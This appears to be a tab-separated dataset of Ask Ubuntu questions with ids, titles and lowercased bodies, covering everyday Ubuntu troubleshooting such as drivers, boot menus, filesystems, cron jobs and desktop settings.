100114	where can i find .deb packages for specific programs ?	for major programs on ubuntu , i can download them using sudo apt-get install < package-name > but sometimes , i need higher versions than the apt source , and ppa 's download speed is too slow for me . so i have to download .deb packages directly . for example , i want to install the latest version of syslinux , where to download the .deb package ? now i know the answer is http : //mirrors.kernel.org/ubuntu/pool/main/s/syslinux/ , but how can i get this address if i do n't know ? similarly , how to find latest .deb packages for gftp , wine etc . ?
100119	how do i list all members in a launchpad team ?	how can i produce a text file list of all members in launchpad team ? for example , this page only shows the list of users in batches of 75 : http : //launchpad.net/~launchpad-beta-testers/+members i would like to get the whole list in one text dump .
100124	force `` save as file '' option when sharing file from ubuntu one	when sharing a mov file from ubuntu one ( see sample url http : //ubuntuone.com/2tmgfbypmaurzydraomo7e ) , then opening the file from your web browser such as firefox , rather than giving you the save as file option it will start streaming the movie file instead . if sharing with friends or family & if the file is large , you do n't want to be streaming the file as it may take some time . is there a way of forcing the `` save as file '' option so the user has the option of saving the file to a directory or streaming the file ? other files such zip or pdf do prompt the option . i know i could zip the file but it would be easier if you did n't have to as you wo n't know which files you share will behave in that manner without testing it . cheers .
100128	how do i package an application to submit to the myapps portal ?	i 'm trying to submit my app to the myapps portal . i really do n't get it what i should submit , source code or deb package ? if source , in which format , whole app as zip , tar.gz ... ?
100136	where does this floating text box come from ?	this is a bit strange , i would of filed it as a bug report , but i have no idea where it belongs . basically , if i focus a window like empathy , or xchat ( or any other gtk application which has a text input box ) without selecting it 's text input box , i get a little floating text input window which my keyboard focuses on ( until i realize and manually select the correct box ) . i have no idea what 's causing this , but it 's becoming really , really annoying . how do i stop it ?
100137	screen blurry , overflows visible area in gnome classic on ubuntu 11.10	i 'm having a lot of trouble getting things setup to work nicely with my monitors in 11.10 . i have an `` old '' vga connected 19 '' acer monitor to the left ( secondary ) and a newer , hd acer monitor connected over dvi to the right ( primary ) . the graphics card on the machine is nvidia 9500 gt . it 's using the optional drivers that you install from the additional drivers menu . i had a ton of problems initially getting setup with the secondary screen , it 's supposed to have a resolution of 1440x900 and it was n't being set to this . now the problem i have is that the primary monitor does n't appear to be in full hd any more , it looks blurry and some of the `` stuff '' at the bottom of any given window is cut off , it 's gone beyond where the screen ends . i 'm not really sure how to go about fixing this . any suggestions ?
100141	acpi problems make wakeup every midnight	since i installed ubuntu on my medion akoya e7214 i have funny problems . it took some time to realize this . with standard settings my computer woke up every midnight . that annoyed a lot . so i searched and found , that acpi is the problem . i tryed to boot with option acpi=off ( in /boot/grub/grub.cfg in the kernel-statement of the menu ) . but now the shutdown is n't working well . i have to switch power off manually and it seems to shut down much more slowly . now i tryed acpi=noirq and i had no keyboard anymore . fortunadly i had an external keyboard to make changes back . now i changed it to acpi=off again . but this is n't what i really want . can anyone give me a clue how to deactivate this wakeup on midnight without deactivating whole acpi ? this seems to be a bug somewhere .
100144	how to fix the look of kde apps in lxde ?	i am using lxde in ubuntu 11.10 . kde apps like kate and kile have an ugly windows-95ish look when run in lxde , but look fine in gnome . how do i choose the theme/widget style for kde apps in lxde ? in case it matters , i installed lxde by using the package lxde , and not lubuntu-desktop since the latter would bring in various things like abiword which i did n't want .
100146	root 's .bashrc not executing on sudo -i	on one of my ubuntu 11.10 servers , when i use sudo -i to become the root user , root 's .bashrc is not being executed . on all other servers , whose relevant configurations are identical as far as i know , it is being executed properly . here 's what i 've checked : .bashrc exists in /root , owned by root : root , permissions 644 /etc/profile and /etc/bash.bashrc are being executed root 's shell is set to `` /bin/bash '' i can execute .bashrc with source .bashrc , after which everything is normal for that session . i can also type bash to execute bash manually after i 've sudoed to root , and .bashrc is then executed ps confirms that the running shell for my root login is bash . anything else to check ?
100156	allow incoming connections from outside lan	i have an openssh-server running on my computer . however , i 'm not able to connect to it from outside my lan . connecting from within lan is no problem at all , it works just as one would expect . however i get a `` connection timed out '' -message when trying to connect from outside lan . i 've already port-forwarded port 22 in my router , so this is not the issue . this problem arose after me having reinstalled my computer . before this , i had no issues . is it a firewall issue in ubuntu 11.10 ? how do i solve this ? edit : i also noticed that this issue is n't limited to port 22 , but all ports .
100161	how do i upgrade to kubuntu+1 ?	i know that ubuntu can be upgraded to a development release by starting update-manager -d however , in kubuntu update-manager is not installed so i suppose some kde-specific program need to be used .
100163	what are the orange circles appearing at the corners of my windows in unity ?	every so often when i am moving a window ( using my laptop touchpad ) orange circles ( with arrows inside ) appear at the corners and midpoints of the window . i think that they 're for resizing , but all that happens is that the window moves with my cursor . how am i triggering this ? how can i stop triggering this ? what are they supposed to be for ?
100167	how to mount hfs+ drive and ignore permissions	i installed ubuntu and windows on my macbook and ubuntu is my primary os ; however , all of my media stays on my osx partition . i want to be able to access it ( at least my osx user 's home folder ) from ubuntu without having to launch a media player ( or anything else ) as root . also , because i occasionally want to fire up my machine in osx , i do n't want to change anything that i would need to change back frequently ( i read a lot about changing uid -- i do n't exactly understand what this entails , but i would n't want to have to change my uid back and forth depending on which os i 'm using . similarly , i do n't want to change file system permissions back and forth ) . also , i saw something about a `` noowner '' option , but that does n't seem to do what i want it to . so i guess i 'd like to be able to do something like this : sudo mount -t hfsplus -o noowner /dev/sda2/ /media/mac and then be able to access all of my media ( at least everything in my osx user 's home folder ) without dropping in as root . ( for clarity : the above command line entry does n't do what i want it to do , but i want to be able to do something similar ) . or would it be better to change my uid ? and if so , how ?
100168	mythtv + file storage in one box	i would like to build a headless ubuntu server to work as ( backup ) file server + work as mythtv backend server recording and sharing tv in home network . it should have flexible hard drive handling to allow adding more disk ( mostly old ones ) to the pool and keep data safe if some disk will brake , like in unraid / freenas systems . is there something ready to use on top of ubuntu servers to create something like this ? thanks -el toro
100171	unable to boot due to gnome power manager error	really am stuck here . i have scoured the net and this seems a fairly common issue pointing to root space . on start up everything seems fine and i get to my users log in page with the 2 users names . however in the bottom right corner is the message in the title . if i log in it just refreshes and goes back to the same log in page . i have pressed ctrl alt f1 as per the posts and logged in with the it password set on this pc . however when i enter sudo apt-get clean the system then asks me for a sudo password . as far as we are aware there is no sudo password on this pc and if there was there are only 3 passwords i ever use and none of them work . i can run other sudo commands however it does not ask me for a password . i have also run the df -h and it looks like i am at 100 % as per others posts . can anyone suggest how i can get around the sudo password or clean up space another way ? thanks j
100173	disable or remove overlay scrollbars in ubuntu ?	for months i 've tried the overlay scrollbars which i think is a fair test and found that , while they are a good idea in principle , in practice they are not good . the delay in appearing and other quirkiness meant they were getting in the way of my computing rather than improving it . i noticed that when using a program with traditional scrollbars , such as , for example , chromium browser , i could easily and quickly get on with things without having to mess about and think about scrollbars which will then often distract me from the task in hand . i 've also tried the 12.04 scrollbars , and while i think they were a bit better , i still found them getting in the way of my computing experience . so please could you tell me how to get traditional scrollbars back in 11.10 ?
100176	amd switchable graphics ( hp probook 4530s-specific ) - any way to enable ?	i 'm proud owner of not-that-expensive , yet powerful laptop ( hp probook 4530s ) . being a fan , and every-day user of ubuntu i was unable a way to use discrete gpu from of my laptop ( hd6490 ) , the only way ubuntu worked for me - was to disable switchable graphics in bios , and get latest xorg from xorg edgers ppa . question : is there a way to install amd catalyst drivers and make discrete gpu provide hardware acceleration , instead of having to use integrated intel hd3000 gpu ?
100183	nginx testing with ab not working with high number of concurrent connections	i have installed nginx and php-fpm on a 64-bit ubuntu server 11.10 . the server works fine but i am trying to test the server ( using ab ) with 10,000 concurrent connections . when i try it i get socket : too many open files ( 24 ) . i have tried some changes involving pam.d and the security conf but nothing worked . any help would be greatly appreciated . thanks
100185	non-ascii fields in list of all members in launchpad team using the launchpadapi ?	i 've written this python script to list all the display_name 's from a team members in launchpad : from launchpadlib.launchpad import launchpad cachedir = `` /home/username/.launchpadlib/cache/ '' launchpad = launchpad.login_anonymously ( 'just testing ' , 'production ' , cachedir ) team = launchpad.people [ '' ] len ( team.members ) for person in team.members : print person.display_name exit ( ) but when i execute the script piping it into an output file , it fails when finding a non-ascii name : $ python get_list.py > /tmp/file traceback ( most recent call last ) : file `` get_list.py '' , line 7 , in < module > print person.display_name unicodeencodeerror : 'ascii ' codec ca n't encode character u'\xf6 ' in position 8 : ordinal not in range ( 128 ) any ideas ?
100186	how to kill only if process is running ?	currently i use line like this in my sh script file : kill `ps aux | grep -f 'myserver ' | grep -v -f 'grep ' | awk ' { print $ 2 } '` but i wonder how to call it only if process ( myserver here ) is running ?
100187	install ubuntu with btrfs and more subvolumes	i want to install an ubuntu server with a btrfs filesystem ( in a raid1 way ) . the problem is that i ca n't see the option in the installer to make more subvolumes . the installer creates two by default : @ and @ home , and i want to separate also @ var @ tmp ... is there any option to do this ? maybe with the shell ... but i think the installer does n't understand the subvolumes feature of btrfs , so you ca n't mount each partition in each subvolume ...
100191	how can i add a new key to my keyboard layout	i have a german keyboard layout for my notebook , which is fine . but my acer travelmate 5735z has a âź key over the left arrow and a $ key over right arrow key . i would like to use them . can you tell me how ?
100206	thinkpad t520 - problem detecting nvidia card after enabling it after installation	i have installed ubuntu 11.10 64 bit edition on my lenovo thinkpad t520 . at that time , i had turn off the discrete graphics through the bios settings to preserve battery life . now , i want to enable the discrete graphics again , but when i do , i can not increase the resolution of the screen higher than 1024:768 . i checked in the system settings- > displays and it shows my screen as being `` unknown '' . i read on how to install the nouveau driver , but ca n't use the procedure explained in https : //help.ubuntu.com/community/binarydriverhowto/nvidia as there is nothing in the `` additional drivers '' dialog box . how can i install the nouveau driver ? here is the output of $ lspci -d10de : -vvvnn 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation device [ 10de:1057 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : lenovo device [ 17aa:21cf ] control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin a routed to irq 16 region 0 : memory at f2000000 ( 32-bit , non-prefetchable ) [ size=16m ] region 1 : memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] region 3 : memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] region 5 : i/o ports at 5000 [ size=128 ] expansion rom at f3080000 [ disabled ] [ size=512k ] capabilities : < access denied > kernel modules : nouveau , nvidiafb
100207	gnome3 shell video corruption with ati radeon hd 4850 on 11.10 oneiric	i have a problem similar to what 's been mentioned in a few other questions , namely : ati incompatible with gnome-shell ? gnome shell glitched top bar ubuntu 11.10 i have read a number of other posts here and on other forums and have tried a bunch of different solutions . the problem the problem manifests itself only in gnome3 . i have tried kde , unity and kfce and all are fine . the graphics corruption is visible only on gnome panels ( see images below ) . everything works fine with the free ati drivers , but they just lack power . the problem occurs with the proprietary ones from amd/ati . i have installed version 11.11 and 12.1 as per the instructions on wiki.cchtml.com/index.php/ubuntu_oneiric_installation_guide . i have the same exact problem in both cases . i have tried this on clean installs of ubuntu 11.10 oneiric ocelot ( x64 and x86 ) and on linux mint 12 ( x64 ) with the same results . also , it looks like after some time of not using it , the pc just freezes . maybe an overheat ? will look into it . things i 've tried i have tried the following fixes : different versions of drivers from ati including the latest - this worked for some , not for me . installing oneiric specific package generated from driver , as well as the default install removed the unity global menu disabled file manager handling desktop disabled compiz `` detect refresh rate '' sync to vblank in compiz on and off please help ! this is the first time in 10 years that i 've finally had the chance to switch my primary desktop to linux ( stopped doing .net dev work ) , and this is really getting me down . this is what the problem looks like : and :
100209	how to add a launcher to a program/script inside my home dir ?	i 'm still using gnome 2 , and i want to add a launcher to gnome-panel that will run : ~/bin/foobar.sh . however , when i tried that , it gives me : failed to execute child process `` ~/bin/foobar.sh '' ( no such file or directory ) i also tried $ home/bin/foobar.sh , same issue . i do n't want to add the absolute path to the script , i want to add a path relative to my home dir . ( also , ~/bin is added to path at .bashrc and .bash_profile , so it is n't added while gnome starts up ) extra information : $ ls -l ~/bin/foobar.sh lrwxrwxrwx 1 username group 25 2012-01-17 18:26 /full/path/to/home/username/bin/foobar.sh - > ../other_scripts/foobar.sh* in other words , ~/bin/foobar.sh is a symlink to a script in another directory , and that script has the +x bit set . i can run ~/bin/foobar.sh without problems inside a terminal , so the issue is not in the script . what i 'm trying to do is to right-click on the gnome-panel and add a custom launcher . then i write ~/bin/foobar.sh as the command , but when i try to click on the launcher , it gives me the errors i mentioned above .
100210	switch back to pseudo-transparency ?	first off , i realize that what i 'm hoping to get is not the expected behavior . on my older desktop , i have the following set up : ubuntu 10.04 . xfce running ( installed after the fact ) . i use the xfce4-terminal , with transparency turned on . in this set up , as expected when a terminal window is over the desktop , it shows the desktop background image . however , if i drag the terminal window on top of a window , it continues to show the background as if the window was n't there . it 's kind of weird that way , but i 've gotten used to it . now , as i 've set up my new desktop ( 11.10 w/ xfce installed ) transparency works the 'normal/correct ' way , but i 'd rather have it go back to leaving out windows . so is it possible to get my new setup to do the old way ?
100211	ca n't install libmodman from source	i have this file libmodman-2.0.1.tar.gz , and want to install it , so i extracted it , navigated to the directory , then ./ configure and i get this : ~/downloads/libmodman-2.0.1 $ ./configure bash : ./configure : no such file or directory this is the content of the libmodman-2.0.1 directory : /cmake/ /libmodman/ authors cmakelists.txt copying install news in the file install is this : cmake ./ make make test sudo make install i tried cmake ./ in the terminal but i get this : bash : ./cmake : is a directory how can i install this file ?
100212	my df totals do n't come close to adding up ... why ?	the results from a df on my main drive on my server do n't add up . i came close to running out of disk space , i freed 4 gigs a couple of days ago , but we 're still getting weird results two days later . filesystem 1k-blocks used available use % mounted on /dev/sda1 78441416 73732352 724536 100 % / now , by my calculation , 78,441,416 - 73,732,352 = 4,709,064 , so there should be over 4 gigs left , not the 724,536k that df is reporting . i do n't see this could be a quota error - though quota -f apparently is n't an option for ubuntu and i have n't yet found a command to recompute the quota . i 'm now going through the various directories doing a du -sk ( glad the server seems to have light traffic for a monday morning ) but not sure what that will tell me . any hints ?
100215	how to keep window always on active workspace ?	i 'm using vlc to play a music video . i use a lot of workspaces and i would like to keep it open and pinned on top on the active workspace . is it possible ?
100226	how to restart gnome-shell from command line ?	i would like to implement a keyboard shortcut to restart gnome-shell whenever this one crashes ( some bugs are n't currently fixed just yet ) . for this i would need a command line to restart the shell . the alt+f2 and restart command wo n't work when the shell is crashed because the prompt is implemented in the shell . hence , how to restart the gnome-shell from command line ?
100231	how to set `` always on top '' on vlc by default ?	i want to always run vlc with `` always on top '' turned on . how to set it up ?
100232	how do i change the grub boot order ?	i have both windows 7 and ubuntu installed on a shared machine . because a lot of the non-developers use windows , i 'd like to change the boot order to make it easier for them . currently the boot order looks like the following : ubuntu 11.10 kernelgeneric *86 ubuntu 11.10 kernelgeneric *86 ( safe boot ) memory test memory test windows 7 on /dev/sda6 how do i change the default order so that windows 7 is at the top of the list ? windows 7 on /dev/sda6 ubuntu 11.10 kernelgeneric *86 ubuntu 11.10 kernelgeneric *86 ( safe boot ) memory test memory test
100233	how can i install a newer kernel ?	i 'm running the current stable ubuntu version ( oneiric ) but have issues with the shipped kernel . newer kernel versions seem to have fixed it , but the kernel-ppa/ppa does not contain the most recent kernel which is why i want to install the kernel from the next stable version ( precise ) . since i want to be able to unload out of tree kernel modules , the mainline kernel from http : //kernel.ubuntu.com/~kernel-ppa/mainline can not be used . i also have have virtual box installed which also need to work in the new kernel so the `` kernel headers '' have to be upgraded as well . how am i supposed to install the kernel packages from the next stable version ( precise ) without upgrading all other packages ?
100237	problem with authorization of any action that requires my password	i use ubuntu 11.10 . after successful obtain of all available updates i have a problem with authorization of any action that requires my password . i can not use ubuntu software center , terminal ... my password input is correct because i use it to log in to the system . can anyone tell me what went wrong ?
100238	disabling the key combination to change keyboard layout	i use a standard english ( uk ) keyboard layout for almost all my work . i very occasionally use a greek keyboard layout , so i have this set as an alternative layout and the wonderful dropdown menu appears next to the mail icon . however , every now and then it seems to change of its own accord . clearly there 's a key combination that i 've accidentally triggered , but i have n't been able to work out what it is . i use the layout so rarely that i do n't want a keyboard shortcut : how can i get rid of this shortcut ?
100239	boot menu does not offer choice between ubuntu and windows	i installed ubuntu 11.10 on my desktop in local drive d as local drive c was already having windows xp . i chose something else while installing ubuntu and formatted with ext3 and chose use as '/ ' . but i did n't chose any partition for swap . now when i rebooted the system after unplugging my usb , i found no boot menu offering choice between windows and ubuntu.simply windows starts up . moreover now i ca n't see any local drive d on windows.however , using my bootable pendrive i were able to use ubuntu directly from usb and can find local drive d & c ( both with new name `` 21 system file '' ) there with ubuntu files loaded there . so now how can i switch between ubuntu and windows and find local drive d on my windows .
100244	how to kill a cron job if it does n't show in ps ? or get it to show in ps ?	i have a cronjob set up like so : ~ > crontab -l 0 * * * * /bin/bash -l -c 'cd /mnt/hgfs/kodiak & & rails_env=test bundle exec rake nightly_tasks -- silent 2 > > ./log/tasks_errors.log' i can see that the cron job is running because it is being logged and the log is being updated . however when i use ps or ps -ef | grep cron i do n't see the running job : ~ > ps -ef | grep cron root 4228 1 0 09:14 ? 00:00:00 cron user 4233 3545 0 09:14 pts/3 00:00:00 grep -- color=auto cron i tried that same command with grep rake and did n't see rake in the list . i did try killing pid 4228 but it did n't stop the rake job from running . killed it 3 or 4 times and still was seeing output in the logs ( and the rake task went to the end ) . how can i kill this cron job ? it runs on the hour and takes about 20 mins to run ( it does a lot and is running hourly because i 'm testing it ) . i 'm troubleshooting it and i 'd like to kill it if it is n't running correctly , which i can see in the logs .
100247	how can i remove unity 's max/min/close buttons on the top left of the dash ?	how can i remove unity 's max/min/close buttons on the top left of the dash ? personally , i feel that they look out of place and since i never use them , i 'd like to remove them .
100250	how do i set up a proxy server in xubuntu ?	notice : i am completely allowed to do this . this is not meant for accessing sites i am not supposed to go on i know that most threads with `` proxy '' in the title have to do with getting to sites they 're not supposed to go on . i hope that i can get this to be as easy as possible . i hope it can be as easy as setting up an openssh server . what happened my dad has just screwed something up in our router settings , and i ca n't access google anymore because if it . i need to be able to access google . he does n't like me in the router because he thinks i will make it worse . ( i am sick of bing and yahoo ) so i want to set up a proxy server that will allow me to work around what he screwed up . what i want to do i want to host it on a computer in my grandpa 's house , and access it with my computer at my dad 's house . it 's running xubuntu . i want it to work with the mozilla firefox on my computer at my dad 's house running ubuntu 11.10 . how can i set this up ? this is only temporary until he fixes whatever he did .
100252	ca n't clone a user profile ?	i have a user profile all setup with all settings the way i want them . i want to copy the entire configured profile to a new user account . this is what i 'm doing ( user is already added to system ) : log out , switch to terminal , service gdm stop . mkdir /home/newuser cp -a /home/olduser/* /home/newuser/ chown newuser : newuser /home/newuser -r service gdm start then i log in as newuser . when i log in , the desktop looks like a brand new user profile and not the customized profile that i copied . i want everything in the new profile . the theme , where the docks are located and configured , desktop icons , firefox favorites , etc . any idea why this is n't working ? i am using ubuntu 10.04
100255	how do i get my graphic card to work properly ?	i been having some problems with my graphic card for a time now . but i had enough when i did n't get oil rush to work on my hp pavilion g6 . the system has suggested hardware drivers for me , but the first time i installed them they pretty much ruined the graphics . after some time i managed to get the computers to work properly ( i thought ) again . when the game did n't work i tried to the hardware drivers for the graphic card anyway . first of all there was to possible choices instead of one , as the last time i installed the drivers ( when it did n't work out so good ) . the choices are : ati/amds proprietary video drivers fglrx ( update for edition ) proprietary fglrx-video drivers for ati/amd i realized the drivers probably are pretty much the same , so i tried the first one . but this did n't work . instead i was asked to `` look in to /usr/var/log/jockey.log '' . this did n't helped me much . instead i chose the other one , which was installed and after reboot there where some changes . first of all there was a lot more details for unity that was n't there before and some shortcut keys are now working that did n't before ( like ctrl + t and the prt sc-button ) . but overall everything does n't work as it used to . like when you browse between the work-spaces it does n't look the same . to get to the point : it does n't work well right now even if i got some things better and now will not oil rush ( as i mentioned in the beginning ) even start . can someone give me any advice with this ? i 'm stuck . ca n't manage to see whats wrong right now . my graphic card is amd radeon hd 6470m .
100263	error while installing rails	following this tutorial here , to install ruby on rails on ubuntu 11.10 with sqlite3 when i run the following command sudo gem install rails i get the following error : error : could not find a valid gem 'rails ' ( > = 0 ) in any repository also , when i try the command , sudo gem install sqlite3 i get the same error error : could not find a valid gem 'sqlite3 ' ( > = 0 ) in any repository how do i resolve this ?
100266	does ubuntu-tv work with the mythbackend or tvheadend ?	the mythbackend or tvheadend does it work for streaming live tv to smart tv ( ubuntu-tv ) .
100275	how do i sign the ubuntu code of conduct ?	in order to submit patches and items to certain projects it says i need to sign the code of conduct . how do i do this ?
100278	how do i install and mount an exfat partition ?	i have searched around here and with google , and none of the instructions i have found work with oneric . how do install exfat and mount an exfat partition in the latest release of kubuntu ?
100279	how do i sign the leadership code of conduct ?	in addition to the code of conduct there is the the leadership code of conduct . can i sign the leadership code of conduct like the regular code of conduct ?
100281	how do i make a pgp key ?	how do i make a pgp key ? i 'd like to have it for signing ppa uploads and such .
100287	how to use open/openvt with command line arguments ?	question : i can start lumisoft mailserver in console mode like this : ./lsmailserver.exe -daemon unfortunately this blocks the terminal that was used . and i am logged in via ssh . i 'm just experimenting with the server , so i need to restart a lot after configuration changes . normally , i 'd use the open command in this circumstance , which normally works fine . it also works fine , when i do open ./lsmailserver.exe with x-forwarding . but i want to run the server terminal-only , which requires the -daemon option . now when i do open opt/mypath/lsmailserver.exe -daemon i get the following error message : open : invalid option -- 'd ' usage : openvt [ -c vtnumber ] [ -f ] [ -l ] [ -u ] [ -s ] [ -v ] [ -w ] -- command_line how can i use open with a program + arguments for that program ?
100289	why is the ubuntu control panel so limited ?	i love the newest version of ubuntu except for one thing : the control panel . it is is limited . is there a way to get another program to access some of these `` locked '' settings ? thank you everyone for your time .
100292	poor video playback - low frame rate	i have pretty poor frame rate when playing .avi video files . i tried vlc player , but i am still not satisfied because it is bad comparing to windows . i played some .rmvb ( realmedia ) movie yesterday , and it was damn slow . i use ati/amd proprietary fglrx graphic driver and default vlc setup . is there anything i can do to speed it up ?
100294	hard disk setup for ubuntu installation	i have the following hard disk setup : c : \ win 7 os disk ntfs d : \ recovery disk ntfs f : \ general ntfs g : \ general ntfs system ntfs hp_tools ntfs the hd is 500gb in size and is a dynamic disk with the partitions as mentioned above . the c : \ drive is the windows 7 os disk . it has a lot of space . should i shrink it and create a new partition out of it and install ubuntu ( dual boot ) there or shrink a partition other than the os partition . note that the disk is a dynamic disk and has 6 partitions ( thanks to hp ) . i imagine it is better to install a different os ( and bootloader ) in the partitions at the 'edges ' like c : \ or g : \ . also , which file system is it better to install ubuntu in ? ext4 or ntfs ? if i uninstall ubuntu in the future , can i reclaim an ext4 partition using windows ? edit : oh rats . the disk is a dynamic disk ! i read that dual boot can not be done on a dynamic disk - it only permits one os to be installed . any methods to convert dynamic disk to basic disk needs deleting the dynamic disk . however i saw some tools which claimed they will magically convert dynamic to basic without data loss .
100296	is there a ppa for gdb 7.4 ?	is there a way to install gdb 7.4 on ubuntu 10.04 using apt-get ? there is some sort of bug with gdb 7.1 that shows up with a program i am debugging . i downloaded and compiled gdb 7.4 from source and that fixed the problem for me . but i would like to update all of my systems to use gdb 7.4 if possible .
100301	is it possible to link to apps in ubuntu software center ?	i would like to link to software ( to mention them in a blog post , for instance ) present in the ubuntu software centre - how can i do so ? is there any alternative besides apturl ?
100305	unable to install any printer	i am unable to install any printer , local or network . i just did a clean install 11.10 , the cups driver is loaded . i even un-installed it and reinstalled it . same problem . the add printer button is grayed out . unable to access any part of the add printer page , top line menu or button .
100306	is an internet connectivity indicator applet available for the unity panel ?	because my internet connection is very unstable at the moment , i 'd like to use a small indicator applet for the unity panel . since i 'm connected through a wlan/wifi router , i can see in the network-applet when the connection to the router is lost , but not when the router loses the connection to the internet . a windows 7 computer of mine has this functionality . it shows a black exclamation mark on yellow ground if it ca n't `` ping '' a remote server . i 'm running ubuntu 11.10 `` oneiric ocelot '' 64-bit with unity 3d .
100316	mouse wheel scrolling without being touched !	it 's making me crazy : - ) xubuntu 64bit 11.10 . my mouse is scrolling without being touched . i scroll up or down , and the mouse just keeps going , or switches direction . happens with microsoft 2.4ghz mouse wireless laser mouse 6000 v2 , and logitech m705 . happens in firefox , chrome , and in desktop shell ( scrolling through apps on taskbar ) it sometimes fixes itself on reboot . sometimes not . any suggestions on where to start ? i have to scroll by dragging the scroll bar and it 's maddening ! here is the necessary hardware information .
100318	music player that can sort or filter by number of tracks ( per artist )	i 'm looking for a music player/music library manager that allows me to see a list of artists sorted by the number of tracks i have for that artist . winamp does this , but i have n't found any ubuntu-compatible applications that will . gmusicbrowser comes the closest . i 've tried banshee , amarok , guayadeque , audacious , and looked at screenshots for a bunch more ( clementine , exaile , quodlibet , jajuk , etc. ) . again , i 'm looking for the ability to sort by how many songs i own per artist . alternately , the ability to show a filtered list of artists based on the number of tracks ( e.g . show me only the artists with more than , say , 10 tracks ) would work .
100320	how do i report a sensitive security issue ?	in ubuntu 10.04 ( and perhaps later ) there appears to be a serious vulnerability to a brute force dictionary attack on any apache server that is using mysql to validate user logins . this issue means that neither fail2ban nor apache mod_security detects the attack . i would prefer not to list the detail here . could someone contact me or explain to me how i can report the problem without posting the vulnerability to the whole world ?
100324	`` configure : error : intel wimax sdk is required `` error when recompiling network manager	i tried to to recompile network manager in this way but did not succeeded . can you explain me how can i install wimax tools ? or tell me what is wrong with my installation ? i installed wimax tools successfully from this source , but when i am trying to compile network manager i get this error : ... checking for qt ... no checking for libnl1 ... no checking for libnl2 ... no checking for libnl3 ... yes checking for uuid ... yes checking for iwmx_sdk ... no configure : error : intel wimax sdk is required
100325	how to get the correct battery status ?	at this moment , ever since i installed ubuntu on this machine , the battery status says : not present . looking at this answer , however , i find that /proc/acpi/battery/bat1/info ( sometimes its /proc/acpi/battery/bat0/info , use tab complete to help ) has the following info : present : yes design capacity : 4400 mah last full capacity : 4400 mah battery technology : rechargeable design voltage : 11100 mv design capacity warning : 300 mah design capacity low : 132 mah cycle count : 0 capacity granularity 1 : 32 mah capacity granularity 2 : 32 mah model number : bat1 serial number : 11 battery type : 11 oem info : 11 in accordance to this answer , i 've checked the /proc/acpi/battery/bat1/state file : present : yes capacity state : ok charging state : charged present rate : unknown remaining capacity : unknown present voltage : 10000 mv the acpi -b command returns : battery 0 : unknown , 0 % , rate information unavailable any suggestions on getting the battery info updated ?
100329	message `` sparse file not allowed '' after installing on a btrfs filesystem	i 've installed ubuntu without creating a swap partition and with / on a btrfs. # now i get the message `` sparse file is not allowed '' on each boot . this message appears before the splash-screen . is there a way to kill this warning ?
100331	what is wrong if my wired ethernet connection keeps coming up and down ? ( and how do i fix it ? )	on both my home and work networks , if i plug in an ethernet cable into my laptop , gnome 's network manager starts cycling between saying `` wired network disconnected '' and `` wired network connection established '' . it does this back and forth about once every couple seconds . the network card is intel corporation 82579lm gigabit network connection and the laptop is a dell precision m6600 . thanks in advance !
100333	`` installed software '' section missing from software center	i have ubuntu 10.10 ( maverick ) and i can not find any option in the software center to list installed programs . i need to access this to streamline my list of programs before i do a fresh install . can anyone help please ? i know about using dpkg to get a list of installed packages , and also using synaptic to view them - but this is not precisely what i want to do . software center used to give the option to view installed apps , no matter how many packages were associated with them . that way it is easier to see which apps i no longer use , rather than browse through a long list of packages that i do n't know the purpose of . i need a simpler view than synaptic , basically , and it used to be in software center !
100337	grub does n't boot-up windows as default even though i modified it using start-up manager	i 'm running ubuntu 11.10 with windows xp using grub 1.99 . i 'm trying to make windows xp boot up as default . however , when i tried using start-up manager or edited the /etc/default/grub file , it still booted up ubuntu . i would like to try grub customizer but i 'm not sure how to extract the file nor does my software center detect the repository when i add it . is there a way i can reorganize the options in grub or make windows the default ?
100340	kernel settings for interactive and responsive desktop	what kernel settings are recommended for an interactive and responsive desktop on a 6 core system with 8gigs of ram ? i 've set swappiness to 10 as recommended in a few guides but what other setting can be tweaked ? are there any tweaks for the cpu ?
100341	unity interface close/minimize/maximize too small	i have ubuntu 11 loaded on a tablet pc ( no mouse or keyboard ) . the close/minimize/maximize buttons are very small . they look good but are so small i ca n't always push them with my finger . i do n't want to use a stylus in this case . how can i set them up to be larger without changing away from unity ?
100345	why should i jump from windows to ubuntu	i wonder if you guys can give me an impartial advise on whether if i should jump from windows to ubuntu . no bias to ubuntu please . i work in a small company with 10 pcs . the sales department use sage accounting package and therefore we must have windows running on these pcs and the main server . other departments are mostly for documentation , email and forecasting . the dispatch department use bespoke package and web based packages ( depending which couriers they talk to ) . we also have one dedicated email machine that handles all sales enquiries . our head office also insists that we use a mac to produce product catalogue . we also have a ms access application that we link via the web to our head office in us . so far we have a win2008 server running ms sql for sage , all pc 's are windows based . the question is `` should we jump to ubuntu from windows ? '' bearing in mind that most of our staff are not very good with computers . i fear they will be even less so if we switch to ubuntu . apart from the cost , what are the strength and weakness of using ubuntu in our office as compare to window ? do we need to hire some specialist to do the support ?
100348	why is 'ppa-purge ' not installed by default ?	a lot of websites encourage you ( omg ubuntu ... ) to install ppa 's but does n't tell you how to uninstall it . on a default install it 's possible to install a ppa by a one-liner but uninstalling is n't a one-liner ... second : the names of the apt cmd 's are strange - > 'apt-add-repository ' and 'ppa-purge ' . why not 'apt-add-repository ' and 'apt-purge-repository ' ? ? ? ( create an alias could help ) if i 'm right , precise will have a 750 mb iso , so they should deffinitly add 'ppa-purge ' to the default disc . is there a dev that could explain me why 'ppa-purge ' is not installed on default ubuntu 12.04 ?
100360	where are keyboard shortcuts stored ?	i would like to not copy all settings from my previous ubuntu install , but i would like to restore my keyboard shortcuts . are these shortcuts stored in some hidden folder in my home folder , and if so which ? i would like to restore as few other settings along with them as possible .
100362	how do i find and use the gnome terminal ?	i 'm a very new user to linux . i ditched windows entirely and installed the first ubuntu i found online ( which turned out to be natty ) . however , i 've used windows my whole life and i do n't understand much computer code . i keep hearing about a `` terminal '' but i ca n't figure out how to run it . can someone help me understand a little bit more how to get the terminal up and enter code into it ?
